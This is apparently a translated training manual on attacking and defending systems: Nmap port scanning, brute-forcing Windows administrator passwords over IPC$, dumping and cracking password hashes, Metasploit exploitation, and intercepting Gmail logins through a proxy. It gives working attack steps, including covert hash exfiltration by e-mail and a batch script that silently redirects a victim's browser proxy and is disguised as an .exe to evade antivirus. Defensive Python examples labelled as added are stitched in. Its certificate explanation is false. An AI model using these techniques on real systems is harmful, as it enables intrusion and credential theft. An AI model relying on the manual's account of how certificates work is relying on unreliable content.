Copyright by Tocbatdat Research manager I-train.com.vn
I-train.com.vn Professional Training Service
Attacking and Defending Systems
Copyright by Tocbatdat
Research Manager
I-train.com.vn
Part I. A complete guide to port scanning and how to defend against it ............ 6
I. Principles of TCP/IP communication ............ 6
1. Structure of a TCP packet ............ 6
2. When a client wants to open a TCP connection with a server ............ 7
3. When a client wants to end a session with a server ............ 8
II. Principles of port scanning a system ............ 8
1. TCP Scan ............ 8
2. UDP Scan ............ 10
III. Port scanning with Nmap ............ 10
IV. Conclusion ............ 13
Part I. Attacking user account passwords in Windows ............ 14
I. Using the For command in Windows ............ 14
1. Decrypting encrypted passwords ............ 16
Part II. Attacking Windows systems through security vulnerabilities ............ 23
1. Using Retina Network Security Scanner 5.1 to find vulnerabilities on a system ............ 24
Part III. Hacking passwords protected by certificate-based authentication and how to defend against it ............ 32
I. General background ............ 32
II. Tools used ............ 35
III. Technique for capturing a Gmail password ............ 36
1. Setting a proxy for the user ............ 36
2. Carrying it out ............ 37
I. Detecting the attack and securing a Gmail account ............ 45
1. Detecting whether network access goes through a proxy ............ 45
Part IV. DoS/DDoS attacks and how to defend against them ............ 50
I. History of DoS attacks ............ 50
1. Targets ............ 50
2. The attacks ............ 50
II. Definition of a DoS attack ............ 51
1. Goals of DoS attacks ............ 51
2. Targets that attackers commonly use DoS attacks against ............ 52
III. Types of attack ............ 52
1. Types of DoS attack ............ 52
IV. DoS attack tools ............ 58
1. DoS tool: Jolt2 ............ 59
2. DoS tool: Bubonic.c ............ 59
3. DoS tool: Land and LaTierra ............ 60
4. DoS tool: Targa ............ 60
5. DoS tool: Blast 2.0 ............ 61
6. DoS tool: Nemesys ............ 61
7. DoS tool: Panther2 ............ 62
8. DoS tool: Crazy Pinger ............ 62
9. DoS tool: Some Trouble ............ 64
10. DoS tool: UDP Flood ............ 65
11. DoS tool: FSMAX ............ 66
V. Conclusion of part I ............ 66
VI. BOTNET networks ............ 68
1. Meaning of a BOT network ............ 68
2. BOT networks ............ 69
3. Botnet networks ............ 69
4. Purposes of using botnets ............ 70
5. Types of BOT network ............ 71
6. Steps to build a botnet? How to analyze a bot network ............ 72
7. Diagram of how a system is infected and used by Agobot ............ 74
VII. DDoS attack tools ............ 74
1. Nuclear Bot ............ 74
VIII. DDoS attacks ............ 75
1. Characteristics of DDoS attacks ............ 76
2. DDoS attacks cannot be completely prevented ............ 76
3. The clever attacker ............ 77
IX. Classification of DDoS attacks ............ 78
X. Reflective DNS attacks ............ 80
1. Issues related to reflective DNS attacks ............ 80
2. Reflective DNS attack tool ihateperl.pl ............ 81
Part VI. Editing the Registry from the command line and its security applications ............ 83
1. The role of the command line ............ 83
2. Creating a .bat file that automates some operations ............ 83
3. Configuring the REGISTRY with a .bat file ............ 85
4. Applications of REGISTRY configuration ............ 87
5. Conclusion ............ 89
Part VII. A complete guide to backdoors and Trojans ............ 90
1. Introduction to Trojans ............ 90
2. Types of Trojan and how they work ............ 91
3. Ways a victim computer gets infected by a Trojan ............ 92
4. The most basic ways to recognize a computer infected by Trojans (may not be accurate) ............ 93
5. Using some kinds of Trojan ............ 94
6. How to hide one or more Trojans inside a normal .exe or executable file ............ 102
7. How to detect Trojans ............ 106
8. How to defend against Trojans and backdoors ............ 110
9. Conclusion ............ 111
Part VIII. Web hacking technique using PHP file upload and how to defend against it ............ 112
I. Required tools ............ 113
1. Burpsuite_v1.3 ............ 113
II. Technique for uploading a PHP file and taking control of the web server ............ 114
1. Preparation ............ 114
2. Uploading a PHP file to the website ............ 114
III. Techniques for protecting the server ............ 138
Part I. A complete guide to port scanning and how to defend against it
In this article I present the basic principles of port scanning on a system: the scanning techniques that let us find out which ports a system is using. Building on those scanning concepts, I also present ways to block scanning of a system. The article covers:
1. Principles of TCP/IP communication
2. Port scanning principles and methods
3. Using the Nmap software
I. Principles of TCP/IP communication
1. Structure of a TCP packet
In this article I focus only on the flag settings in the TCP packet, since they are what port scanning relies on:
- The SYN flag requests a connection between two machines
- The ACK flag replies that the connection between the two machines can begin
- The FIN flag ends the connection between the two machines
- The RST flag from the server tells the client that this communication is refused (cannot be used)
- The PSH flag is used in combination with the URG flag
- The URG flag sets the priority of this packet.
In fact each of these flags in the packet is represented by just a 1 or a 0: if it is 0 the TCP packet does not set that flag, if it is 1 the flag is set. They occupy, in order, the 8 bits of the Flags field.
2. When a client wants to open a TCP connection with a server:
+ Step I: The client sends the server a SYN packet
+ Step II: The server replies to the client with a SYN/ACK packet
+ Step III: When the client receives the SYN/ACK packet it sends the server an ACK packet, and the exchange of data between the two machines begins.
3. When a client wants to end a session with a server
+ Step I: The client sends the server a FIN ACK packet
+ Step II: The server sends the client an ACK packet
+ Step III: The server then sends the client a FIN ACK packet
+ Step IV: The client sends the server an ACK packet, and the disconnection between server and client is complete.
II. Principles of port scanning a system
1. TCP Scan
A TCP/UDP packet has 16 bits for the port number, which means there are ports 1 to 65535. No hacker scans every port on a system; they scan only the most commonly used ones, usually just ports 1 through 1024.
Above I described how a connection is set up and torn down between two machines on the network. Based on these TCP communication principles, I can scan for open ports on a system using the following methods:
- SYN Scan: The client fires a SYN packet for a particular port at the server; if the server sends back a SYN/ACK packet, the client knows that port on the server is open. If the server sends back an RST/SYN packet, I know that port on the server is closed.
- FIN Scan: The client has no connection to the server but still creates a FIN packet for a particular port and sends it to the server being scanned. If the server sends back an ACK packet, the client knows the server has that port open; if the server sends back an RST packet, the client knows the server has that port closed.
- NULL Scan: The client sends the server TCP packets for the port being scanned with no flags set at all; if the server sends back an RST packet, I know that port on the server is closed.
- XMAS Scan: The client sends TCP packets for the port being scanned with several flags set: FIN, URG, PSH. If the server returns an RST packet, I know that port on the server is closed.
- TCP Connect: This method is very practical: it sends the server real connection requests to specific ports. If the server returns a SYN/ACK packet, the client knows the port is open; if the server sends back an RST/ACK packet, the client knows that port on the server is closed.
- ACK Scan: this kind of scan aims to discover the access control lists on the server. The client tries to connect to the server with an ICMP packet; if it receives a Host Unreachable packet, the client understands that port on the server is filtered.
There are a few kinds of scan for typical services that are easily attacked, such as:
- RPC Scan: Tries to check whether the system has a port open for the RPC service.
- Windows Scan: similar to the ACK scan, but it can be run against only certain ports.
- FTP Scan: Can be used to see whether the FTP service is in use on the server.
- IDLE: allows checking the state of the server.
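The flag bits and the probe shapes above are easiest to see on real header bytes. The following is an added example, not code from the original article: it builds a few TCP headers, decodes the 8-bit Flags field, and labels each segment by the flag combination the scan types described above send or receive (NULL, XMAS, FIN, SYN, SYN/ACK, RST). The flag-to-bit order follows RFC 793 (FIN is bit 0); all sample packets are constructed here, not captured from a network.

```python
import struct

# TCP flag bits, low bit first (FIN is bit 0, CWR is bit 7): the "8 bits of the
# Flags field" the text refers to.
FIN, SYN, RST, PSH, ACK, URG, ECE, CWR = (1 << i for i in range(8))
FLAG_NAMES = {FIN: "FIN", SYN: "SYN", RST: "RST", PSH: "PSH",
              ACK: "ACK", URG: "URG", ECE: "ECE", CWR: "CWR"}


def build_tcp_header(src_port, dst_port, flags, seq=0, ack=0, window=8192):
    """Build a 20-byte TCP header with no options (checksum left 0).
    Used here only to construct sample packets."""
    offset_and_flags = (5 << 12) | (flags & 0x1FF)   # data offset 5 words = 20 bytes
    return struct.pack("!HHIIHHHH", src_port, dst_port, seq, ack,
                       offset_and_flags, window, 0, 0)


def parse_tcp_header(data):
    """Parse the fixed part of a TCP header into a dict of its fields."""
    if len(data) < 20:
        raise ValueError("TCP header needs at least 20 bytes")
    src, dst, seq, ack, off_flags, window, csum, urg = struct.unpack("!HHIIHHHH", data[:20])
    return {"src_port": src, "dst_port": dst, "seq": seq, "ack": ack,
            "data_offset": (off_flags >> 12) * 4, "flags": off_flags & 0xFF,
            "window": window, "checksum": csum, "urgent_pointer": urg}


def flag_names(flags):
    """Names of the flags set, in bit order."""
    return [name for bit, name in FLAG_NAMES.items() if flags & bit]


def classify_probe(flags):
    """Label a segment by the flag combinations the scan types in the text use.
    Only the six classic flags are considered; ECE/CWR are ignored."""
    f = flags & 0x3F
    if f == 0:
        return "NULL probe (no flags set)"
    if f == FIN | PSH | URG:
        return "XMAS probe (FIN+PSH+URG)"
    if f == FIN:
        return "FIN probe (FIN without ACK)"
    if f == SYN:
        return "SYN (connection request; also what a SYN or connect scan sends)"
    if f == SYN | ACK:
        return "SYN/ACK (handshake reply: port open)"
    if f & RST:
        return "RST (port closed or connection refused)"
    if f == ACK:
        return "ACK (handshake completion, or an ACK-scan probe outside a connection)"
    return "other: " + "+".join(flag_names(f))


# Constructed sample segments (not captured traffic): a normal three-way handshake
# on port 80, three probe shapes against port 22, and the reply a closed port gives.
SAMPLES = [
    ("handshake-1", build_tcp_header(40000, 80, SYN, seq=1000)),
    ("handshake-2", build_tcp_header(80, 40000, SYN | ACK, seq=5000, ack=1001)),
    ("handshake-3", build_tcp_header(40000, 80, ACK, seq=1001, ack=5001)),
    ("probe-a", build_tcp_header(40001, 22, 0)),
    ("probe-b", build_tcp_header(40002, 22, FIN | PSH | URG)),
    ("probe-c", build_tcp_header(40003, 22, FIN)),
    ("reply", build_tcp_header(22, 40003, RST | ACK)),
]


def classify_samples(samples=SAMPLES):
    """Map each sample label to the verdict for its flags."""
    return {label: classify_probe(parse_tcp_header(raw)["flags"]) for label, raw in samples}


if __name__ == "__main__":
    for label, verdict in classify_samples().items():
        print(f"{label:12s} {verdict}")
```

A NULL, XMAS or bare FIN segment never appears in a legitimate connection, so an IDS rule that matches on those flag combinations catches those three scan types regardless of which ports they touch; the SYN and connect scans look like ordinary connection attempts and have to be caught by rate instead.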
2. UDP Scan
Whereas packets sent over TCP are guaranteed to arrive intact at their destination, packets sent over UDP serve the need for fast data transfer with small packets. With TCP transmission, an attacker can easily scan which ports a system has open based on the flags in the TCP packet.
Structure of a UDP packet
As we can see, the UDP packet contains no flags, so the TCP port scanning methods cannot be used for UDP. Unfortunately, most systems allow ICMP packets.
If a port is closed, when the server receives the ICMP packet from the client it will try to send back an ICMP type 3 code 3 (port unreachable) packet to the client. When performing a UDP scan, be prepared for results that are not very reliable.
III. Port scanning with Nmap
Nmap is a very powerful port scanning tool, famous for a long time and trusted by hackers. It supports every port scanning method, and in addition it supports scanning for hostnames and the services running on the system.
Nmap now has both a graphical interface and a command-line interface, and runs on both *NIX and Windows.
Nmap is free software; download it at:
http://nmap.org/download.html
Below is how to use Nmap to scan
C:\nmap-3.93>nmap -h
Nmap 3.93 Usage: nmap [Scan Type(s)] [Options]
Some Common Scan Types ('*' options require root privileges)
* -sS TCP SYN stealth port scan (default if privileged (root))
-sT TCP connect() port scan (default for unprivileged users)
* -sU UDP port scan
-sP ping scan (Find any reachable machines)
* -sF,-sX,-sN Stealth FIN, Xmas, or Null scan (experts only)
-sV Version scan probes open ports determining service and app names/versions
-sR/-I RPC/Identd scan (use with other scan types)
Some Common Options (none are required, most can be combined):
* -O Use TCP/IP fingerprinting to guess remote operating system
-p ports to scan. Example range: '1-1024,1080,6666,31337'
-F Only scans ports listed in nmap-services
-v Verbose. Its use is recommended Use twice for greater effect.
-P0 Don't ping hosts (needed to scan www.microsoft.com and others)
* -Ddecoy_host1,decoy2[,...] Hide scan using many decoys
-6 scans via IPv6 rather than IPv4
-T General timing policy
-n/-R Never do DNS resolution/Always resolve [default: sometimes resolve]
-oN/-oX/-oG Output normal/XML/grepable scan logs to
-iL Get targets from file; Use '-' for stdin
* -S /-e Specify source address or network interface
--interactive Go into interactive mode (then press h for help)
--win_help Windows-specific features
Example: nmap -v -sS -O www.my.com 192.168.0.0/16 '192.88-90.*.*'
SEE THE MAN PAGE FOR MANY MORE OPTIONS, DESCRIPTIONS, AND
EXAMPLES
Nmap Scan
a. Scan types supported by Nmap
Nmap -sT: here the letter s means Scan and the letter T means a TCP scan
Nmap -sU: uses a UDP scan
Nmap -sP: uses a ping scan
Nmap -sF: uses a FIN scan
Nmap -sX: uses the XMAS scan method
Nmap -sN: uses the NULL scan method
Nmap -sV: scans for application names and their versions
Nmap -sR/-I: RPC scan
b. Advanced options combined with the scan types in Nmap
- -O: used to find out the operating system running on the server. For example, to use Nmap with the XMAS scan method and guess the operating system of www.vnexperts.net, we use the command: nmap -sX -O www.vnexperts.net
- -p: the range of ports to scan
- -F: only the ports in Nmap's scan list
- -v: scans twice to increase the reliability and effectiveness of whichever scan method we use.
- -P0: does not ping, in order to get past the scan-blocking measures on websites or servers.
For example, to scan the site www.vnexperts.net with a UDP scan over ports 1 to 1024, scanning twice to improve the result and without pinging the site:
nmap -sU -p 1-1024 -v -P0 www.vnexperts.net
Nmap also supports a hidden-scan feature to evade scan detection on the server, for example:
-Ddecoy_host1,decoy2 hides the scan.
-6: scans over IPv6
Nmap also gives us options to output the results in several different file formats.
IV. Conclusion
Port scanning is one of the first steps in attacking a system; once we understand the scanning methods, we can use Nmap to carry them out. Our way to block scanning is then to use dedicated devices such as IPS and IDS to detect and stop the attack.
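The conclusion leaves "detect with IDS/IPS" unexplained. As an added example (not from the original article), this is the core of such a detector run over a handful of constructed firewall log lines: it raises one alert when a single source touches ten or more distinct ports within ten seconds (a sweep, which catches SYN and connect scans), and one alert for each source that sends a flag combination no legitimate connection uses (NULL, XMAS, bare FIN). The log format, the threshold and the window are assumptions made for the example, not the format of any real product.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Simplified, constructed firewall log format (not the output of a real product):
# <timestamp> <ACCEPT|DROP> SRC=<ip> DST=<ip> PROTO=<proto> DPT=<port> FLAGS=<tcp flag letters>
LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<action>ACCEPT|DROP) SRC=(?P<src>\S+) DST=(?P<dst>\S+) "
    r"PROTO=(?P<proto>\S+) DPT=(?P<dpt>\d+) FLAGS=(?P<flags>\S*)$"
)

WINDOW = timedelta(seconds=10)  # look-back window per source address
THRESHOLD = 10                  # distinct destination ports within the window => sweep
# Flag combinations that never occur in a legitimate connection (see the scan types above).
ODD_FLAGS = {"": "NULL", "FPU": "XMAS", "F": "FIN"}


def parse_line(line):
    """Return a dict for one log line, or None if it does not match the format."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.fromisoformat(rec["ts"])
    rec["dpt"] = int(rec["dpt"])
    return rec


def detect_scans(lines, window=WINDOW, threshold=THRESHOLD):
    """Return alert strings: one per (source, probe kind) and one per port sweep."""
    alerts = []
    history = defaultdict(list)  # src -> [(timestamp, dst port)] within the window
    alerted = set()
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        src, ts = rec["src"], rec["ts"]
        kind = ODD_FLAGS.get(rec["flags"]) if rec["proto"] == "TCP" else None
        if kind and (src, kind) not in alerted:
            alerted.add((src, kind))
            alerts.append(f"{src}: {kind} probe to port {rec['dpt']} at {ts.isoformat()}")
        recent = [(t, p) for t, p in history[src] if ts - t <= window]
        recent.append((ts, rec["dpt"]))
        history[src] = recent
        ports = {p for _, p in recent}
        if len(ports) >= threshold and (src, "SWEEP") not in alerted:
            alerted.add((src, "SWEEP"))
            alerts.append(f"{src}: {len(ports)} distinct ports within "
                          f"{int(window.total_seconds())}s (port sweep)")
    return alerts


# Constructed sample log: one host sweeping 12 ports with SYNs, a normal client
# making two HTTPS connections, and one host sending NULL and XMAS probes.
SAMPLE_LOG = [
    f"2024-05-01T10:00:0{1 + i // 5} DROP SRC=203.0.113.5 DST=192.0.2.10 "
    f"PROTO=TCP DPT={21 + i} FLAGS=S"
    for i in range(12)
] + [
    "2024-05-01T10:00:04 ACCEPT SRC=198.51.100.7 DST=192.0.2.10 PROTO=TCP DPT=443 FLAGS=S",
    "2024-05-01T10:00:05 ACCEPT SRC=198.51.100.7 DST=192.0.2.10 PROTO=TCP DPT=443 FLAGS=S",
    "2024-05-01T10:00:06 DROP SRC=203.0.113.9 DST=192.0.2.10 PROTO=TCP DPT=80 FLAGS=",
    "2024-05-01T10:00:07 DROP SRC=203.0.113.9 DST=192.0.2.10 PROTO=TCP DPT=443 FLAGS=FPU",
]

if __name__ == "__main__":
    for alert in detect_scans(SAMPLE_LOG):
        print(alert)
```

The normal client in the sample never trips either rule: it repeats one port, so its distinct-port count stays at one. The decoy option (-D) mentioned above defeats the per-source count by spreading the same sweep over many forged sources, which is why a production IDS also counts per destination port and per destination host.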
Part II. A complete guide to hacking Windows and how to defend against it
Windows is the most widely used operating system in the world, and it always harbours security flaws. In this article I present methods of attacking a computer running Windows. From that knowledge of how Windows computers can be attacked, I will propose security measures for the system.
The article covers:
1. Attacking account passwords in Windows.
2. Attacking Windows computers through security vulnerabilities
Part I. Attacking user account passwords in Windows
[Diagram: the victim machine (running Windows 2003) and the attacking machine connected through a switch]
I. Using the For command in Windows
- The victim machine has IP address 192.168.1.18; the machine used to attack is also on the 192.168.1.0/24 network.
- Almost all machines share resources on the network, and there is a hidden share enabled by default: \\computer\IPC$
- Once we know the user on that machine is Administrator, all we care about is how to find that account's password.
- Create a dictionary file containing most common passwords; the Dictionary Generator tool can be used to build this dictionary.
- The structure of the for command:
for /f "tokens=1" %a in (vnedic.txt) do net use * \\computer\IPC$ /user:administrator %a
- Here vnedic.txt is the dictionary file that was created, and net use is used to map the share. I put the dictionary file on I: under the name vnedic.txt. After the system tries the passwords in vnedict.txt, it finds that the Administrator password of machine 192.168.1.8 is 123.
- There are many ways to generate a dictionary for use with the for command to attack a Windows system.
- The drawback of this method is that it is very slow against a system with a complex password.
Defence against attacks using the For command:
- Set in Group Policy that after 5 wrong password attempts the account is locked for 30 minutes
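To see what that one Group Policy setting does to the dictionary attack above, the following added example (not code from the original article) models the lockout rule as an authentication server would apply it and replays a sequential wordlist against it, waiting out each lockout. The failure-observation window of 30 minutes, the wordlist and the position of the real password are assumptions of the example.

```python
from dataclasses import dataclass, field
from datetime import datetime, timedelta
from typing import Optional

# The policy stated in the text: 5 wrong passwords locks the account for 30 minutes.
LOCKOUT_THRESHOLD = 5
LOCKOUT_DURATION = timedelta(minutes=30)
FAILURE_WINDOW = timedelta(minutes=30)   # assumed: failures older than this are forgotten
DEMO_START = datetime(2024, 5, 1, 9, 0, 0)  # constructed start time for the replay


@dataclass
class AccountState:
    failures: list = field(default_factory=list)   # timestamps of recent bad attempts
    locked_until: Optional[datetime] = None


class LockoutPolicy:
    """Model of an account lockout policy, as an authentication server would apply it."""

    def __init__(self, threshold=LOCKOUT_THRESHOLD, duration=LOCKOUT_DURATION,
                 window=FAILURE_WINDOW):
        self.threshold, self.duration, self.window = threshold, duration, window
        self.accounts = {}

    def attempt(self, user, when, password_ok):
        """Process one logon attempt; return 'locked', 'ok' or 'failed'."""
        st = self.accounts.setdefault(user, AccountState())
        if st.locked_until is not None:
            if when < st.locked_until:
                return "locked"          # rejected without checking the password at all
            st.locked_until = None       # lockout expired
            st.failures.clear()
        st.failures = [t for t in st.failures if when - t < self.window]
        if password_ok:
            st.failures.clear()
            return "ok"
        st.failures.append(when)
        if len(st.failures) >= self.threshold:
            st.locked_until = when + self.duration
        return "failed"


def simulate_dictionary_attack(policy, user, wordlist, real_password, start):
    """Try the wordlist in order, one guess per second, waiting out every lockout.
    Returns (guesses sent, elapsed time) until the real password is accepted."""
    now, sent = start, 0
    for word in wordlist:
        while True:
            sent += 1
            result = policy.attempt(user, now, word == real_password)
            if result == "ok":
                return sent, now - start
            if result == "failed":
                now += timedelta(seconds=1)
                break
            # 'locked': wait until the lock expires, then retry the same word
            now = policy.accounts[user].locked_until
    return sent, now - start


def compare_policies(wordlist, real_password, start=DEMO_START):
    """Run the same attack with and without lockout.
    Returns {label: (guesses sent, elapsed seconds)}."""
    out = {}
    for label, policy in (("no lockout", LockoutPolicy(threshold=10 ** 9)),
                          ("lockout", LockoutPolicy())):
        sent, elapsed = simulate_dictionary_attack(policy, "administrator",
                                                   wordlist, real_password, start)
        out[label] = (sent, int(elapsed.total_seconds()))
    return out


if __name__ == "__main__":
    # Constructed wordlist; the real password is the 23rd entry.
    words = [f"pass{i:02d}" for i in range(40)]
    for label, (sent, seconds) in compare_policies(words, words[22]).items():
        print(f"{label:12s} guesses={sent:3d} elapsed={timedelta(seconds=seconds)}")
```

With the password 23rd in the list, the attack without lockout succeeds in 22 seconds; with the policy from the text it takes 2 hours, and every further five words cost another 30 minutes. Note also that while the account is locked the correct password is rejected too, which is why the same policy makes a deliberate lockout a denial-of-service against the legitimate user.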
1. Decrypting encrypted passwords
a. On the local machine
- Suppose you do not know the password of a computer on the system, but you ask its owner to type in their password and lend you the computer for a while. Your problem now is how to find out the password on the machine you are logged on to.
- Many programs can export the encrypted form of the password to a file, typically PasswordDump and WinPasswordPro; in this article I show how to use WinPasswordPro.
Start WinPasswordPro and import the passwords from the local machine
After importing the passwords from the SAM file you get
Then we export the list of users and encrypted passwords to a .txt file and send it to our own e-mail; on our own machine we use the same program to decrypt it.
Opening the exported TXT file we have the encrypted password data
After obtaining the encrypted user/password data, we uninstall this program from the victim machine so as not to be discovered, then e-mail the file and decrypt it on our own machine. This is the time-consuming step: for a password under 10 characters it takes about 1 hour.
- Start WinPasswordPro on our machine, choose File -> Import PWDUMP file, then select the path to the encrypted password file.
After importing from the PWDUMP file, clicking Start gives us 3 password attack methods:
+ Brute Force
+ Dictionary
+ Smart Table
I choose the Brute Force attack method
Wait about 15 minutes (this is a password I set myself: no special characters, no digits, no upper case, 9 characters)
- At the end of the process I have decrypted the encrypted password file: user administrator with password vnexperts
b. Attacking a remote machine
- When we can sit at the victim's machine, exporting the encrypted passwords is simple, but in practice this method is rarely possible.
- With Password Dump we can get the encrypted data from a remote machine.
- Here I use PasswordDump version 6.1.6
Above I pull the encrypted username and password data from computer 192.168.1.156 using PWDump and write it to the file vnehack.txt on C:, then use the type command to view the file's contents.
Once we have this data, we again use WinPasswordPro to decrypt it. And once we have the Administrator account and its password, what to do next is up to us.
- Defences against this form of attack:
+ Be wary of people who get access to our computer.
+ Set passwords longer than 14 characters containing all character types: special, upper case, digits, lower case
+ Enable the firewall to block PasswordDUMP; install and update the latest patches from the vendor
+ Install at least one strong antivirus program.
These disable PWdump, but note that when the attacker has an account on the system the situation is completely different: they will get past most of these security measures. In this case I have an ordinary user named vne and I can export all the encrypted username/password data on the server.
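The "more than 14 characters, all four classes" rule above is worth quantifying against the two cracking times the text reports. The following added example (not code from the original article) checks a password against that rule and compares the size of the brute-force search space, calibrating the guess rate from the text's own figure of about 15 minutes for the 9 lower-case letters of vnexperts. The calibration assumes the whole keyspace was searched, and the sample passwords are constructed for the example.

```python
import string

# Character classes the text requires; the sizes are what a brute-force search must cover.
CLASSES = {
    "lower": string.ascii_lowercase,
    "upper": string.ascii_uppercase,
    "digit": string.digits,
    "special": string.punctuation,
}
MIN_LENGTH = 15   # "longer than 14 characters" as the text puts it


def classes_used(password):
    """Which of the four classes the password draws from."""
    return {name for name, chars in CLASSES.items() if any(c in chars for c in password)}


def check_policy(password):
    """Check the text's policy: more than 14 characters and all four classes present.
    Returns (ok, list of problems)."""
    problems = []
    if len(password) < MIN_LENGTH:
        problems.append(f"length {len(password)} is below {MIN_LENGTH}")
    missing = sorted(set(CLASSES) - classes_used(password))
    if missing:
        problems.append("missing character classes: " + ", ".join(missing))
    return (not problems, problems)


def keyspace(password):
    """Number of candidates an exhaustive search over the same length and classes covers."""
    alphabet = sum(len(CLASSES[name]) for name in classes_used(password))
    return alphabet ** len(password)


# Calibration taken from the text's own figure: 9 lower-case letters took about 15
# minutes. Assumes the whole keyspace was searched, which slightly overestimates the
# rate (the real password was found before the search ended).
CALIBRATED_RATE = keyspace("vnexperts") / (15 * 60)   # guesses per second


def seconds_to_exhaust(password, rate=CALIBRATED_RATE):
    """Worst-case time to exhaust the keyspace at the given guess rate."""
    return keyspace(password) / rate


def human_time(seconds):
    """Rough human-readable duration."""
    if seconds < 3600:
        return f"{seconds / 60:.1f} minutes"
    if seconds < 86400 * 365:
        return f"{seconds / 3600:.1f} hours"
    return f"{seconds / (86400 * 365):.3g} years"


if __name__ == "__main__":
    # Constructed sample passwords; the first is the one recovered in the text.
    for pw in ["vnexperts", "Vnexperts2024", "Vne-Experts_2024!"]:
        ok, problems = check_policy(pw)
        print(f"{pw!r:22s} policy={'ok' if ok else 'FAIL'} {problems} "
              f"keyspace={keyspace(pw):.3g} exhaust={human_time(seconds_to_exhaust(pw))}")
```

At the calibrated rate the 9-letter password is exhausted in 15 minutes, while a 17-character password drawn from all 94 printable classes would take on the order of 10^16 years, so the policy moves the attacker from "wait" to "impossible" even against a far faster cracker.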
Part II. Attacking Windows systems through security vulnerabilities
- First we must find the security vulnerabilities.
- Then exploit the vulnerabilities found
1. Using Retina Network Security Scanner 5.1 to find vulnerabilities on a system
Start Retina Network Security Scanner:
To find which machines on the network are online, go to the Discover section
To discover security vulnerabilities, use the Audit tab
I will use this program to check machine 192.168.1.8
Click Start and choose the Complete Scan scan template:
After a moment I get a surprising result: machine 192.168.1.8 has a great many security vulnerabilities
- I find a dangerous unpatched flaw on the machine in the RPC service: Windows RPC DCOM Multiple Vulnerabilities.
- Reading the extended description of this flaw, I find that it allows unauthorized access to that computer.
Retina Network Security Scanner is very effective software for scanning a system and discovering security vulnerabilities. It is commercial software.
1. Using Metasploit to exploit
- We will now use Metasploit to exploit the vulnerabilities Retina just found; here I use Metasploit 2.7 (version 3.0 is now available)
After installing Metasploit I start the web interface as shown below:
- After starting MSFWeb I open IE and type the address: http://127.0.0.1:55555
- In Filter Modules choose Windows 2003
Among the flaws found that Metasploit can exploit on Windows 2003, I find the RPC Service flaw
Click on this vulnerability
The program reports that this vulnerability can be exploited on the NT, 2K, XP and 2K3 operating systems
Clicking it, the system lets us use the programs below to exploit this vulnerability
I choose Win32_Reverse_vncinject
After choosing vncinject, I choose the host to exploit: 192.168.1.8
Click Exploit to exploit the vulnerability above
The result is excellent: I have a remote desktop to that machine without going through any authentication, and I now have full control of this computer.
A result that gives security people a headache, but we are not without defences.
- The way to defend against these security flaws:
+ Always install the latest patches from the vendor
+ Enable the firewall and open only the ports the applications need
+ Have an IDS device to detect intrusions
+ Have a firewall to block scanning of the running services.
Part III. Hacking passwords protected by certificate-based authentication and how to defend against it
In this article I present a technique for hacking passwords on sites that use certificate encryption, such as gmail.com or other websites that authenticate in the same way (SSL certificate, HTTPS). Since your Gmail password could be exposed this way, I also show how to recognize and prevent this risk.
I. General background
- Gmail and other web services usually use HTTPS to encrypt the user/password packet. When the browser uses the certificate Gmail provides and encrypts with it, the user/password packet travelling over the network is (almost absolutely) safe.
- The question is how the password can be hacked despite such highly secure authentication and encryption methods.
The normal authentication process when a user accesses Gmail:
Step 1: The user accesses gmail.com
Step 2: Gmail sends information to VeriSign to obtain a certificate
Step 3: VeriSign sends Gmail back a certificate consisting of a public key and a private key
Step 4: Gmail sends the user the public key to encrypt the authentication information
Step 5: The user encrypts with the public key and sends it to Gmail
Step 6: Gmail decrypts with the private key
*Note: the user/password packet the user sends to Gmail is encrypted with the public key, and only the private key can decrypt it. Since Gmail keeps the private key and never sends it over the network, this packet is extremely secure and cannot be decrypted.
The certificate spoofing technique
The user's connection to Gmail does not go directly but through an intercepting proxy, and the certificate is spoofed
Step 1: The user goes to Gmail
Step 2: When the packet from the user reaches the intercepting proxy, the proxy modifies the information and sends it on to Gmail
Step 3: Gmail sends a request to VeriSign to generate a certificate
Step 4: VeriSign sends the certificate back to Gmail. Gmail keeps the private key and sends the requester the public key
Step 5: Gmail sends the public key to the intercepting proxy; this key is not sent on to the user
Step 6: The intercepting proxy creates its own key pair and sends its public key to the user
Step 7: The user encrypts user/pass with this fake public key generated by the proxy and sends it to the proxy. Because the proxy generated the key pair itself, it has the private key to decrypt it.
Step 8: After decrypting the packet the user sent, the proxy uses the public key Gmail sent it to encrypt the data again and send it on to Gmail, and authentication still succeeds
*Note: an attacker sitting on the intercepting proxy can learn the user's user/password completely. If the user does not notice that they are going through an intercepting proxy, the user/password can be fully exposed, even though very secure authentication methods are in use
II. Tools used
- Burpsuite_v1.3
Download link: http://www.portswigger.net/suite/burpsuite_v1.3.zip
This is a tool whose function is an intercepting proxy
- Java (Burpsuite is a .jar file that runs on Java)
Download link: http://sun.com
- IE, Firefox
- A tool that sets the proxy via a file
This is a tool I wrote myself as a .bat file; you can also convert the .bat to an .exe so that when the user clicks the file it automatically sets the proxy
- Quick_Batch_File_Compiler_3.21 is a tool that converts a .bat file to an .exe
III. Technique for capturing a Gmail password
- The most common way is a keylogger, but that does not work when strong antivirus programs are present.
- Exporting information from the web browser, such as IE or Firefox. This does not work when the user has not saved the user/password in the browser
- Another way is to spoof the certificate and use an intercepting proxy
1. Setting a proxy for the user
- For everything the user accesses on the web to go through the intercepting proxy, a proxy must be set in the user's browser
- You can set it by hand (if you somehow have control of the victim's computer)
- Or get the user to run an .exe file that we wrote to set the proxy
********
Create a .bat file with the content:
echo Windows Registry Editor Version 5.00 > 1
echo [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings] >2
echo "MigrateProxy"=dword:00000001 > 3
echo "ProxyEnable"=dword:00000001 > 4
echo "ProxyHttp1.1"=dword:00000000 > 5
echo "ProxyServer"="IP:port" > 6
echo "ProxyOverride"="" > 7
copy /b "1"+"2"+"3"+"4"+"5"+"6"+"7" b.reg
del 1 /f /q
del 2 /f /q
del 3 /f /q
del 4 /f /q
del 5 /f /q
del 6 /f /q
del 7 /f /q
regedit.exe /s b.reg
del b.reg /f /q
********
Then use Quick_Batch_File_Compiler_3.21 to convert this .bat file into an .exe
- When the user clicks this file, it automatically sets the proxy for IE; replace IP with the IP you need and port with the port the proxy uses. What is notable is that no antivirus program treats this file as a virus
- In this article I use a single computer, so the proxy I set in the browser is 127.0.0.1
2. Carrying it out
Step 1: Install Java
Step 2: Run Burpsuite
Step 3: Set the proxy
Step 4: Access Gmail
